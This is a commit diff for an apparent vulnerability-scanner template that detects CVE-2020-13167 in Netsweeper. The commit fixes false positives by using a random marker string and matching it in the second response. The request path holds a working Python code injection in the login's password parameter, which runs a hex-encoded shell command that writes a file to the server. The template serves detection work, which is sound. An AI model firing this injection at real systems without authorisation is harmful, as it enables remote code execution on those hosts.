Fixed FP - CVE-2020-13167
parent
59d51eee14
commit
249ad821ec
|
@ -19,15 +19,18 @@ info:
|
||||||
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
hex-payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
|
|
||||||
vendor: netsweeper
|
vendor: netsweeper
|
||||||
product: netsweeper
|
product: netsweeper
|
||||||
tags: cve,cve2020,netsweeper,rce,python,webadmin
|
tags: cve,cve2020,netsweeper,rce,python,webadmin
|
||||||
|
|
||||||
|
variables:
|
||||||
|
randomstring: {{randstr}}
|
||||||
|
payload: echo "{{base64(randomstring)}}" | base64 -d > /usr/local/netsweeper/webadmin/out
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
|
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(payload))}}%27.decode%28%27hex%27%29%29%23&timeout=5"
|
||||||
- "{{BaseURL}}/webadmin/out"
|
- "{{BaseURL}}/webadmin/out"
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
|
@ -36,9 +39,9 @@ http:
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "nonexistent"
|
- "{{randomstring}}"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue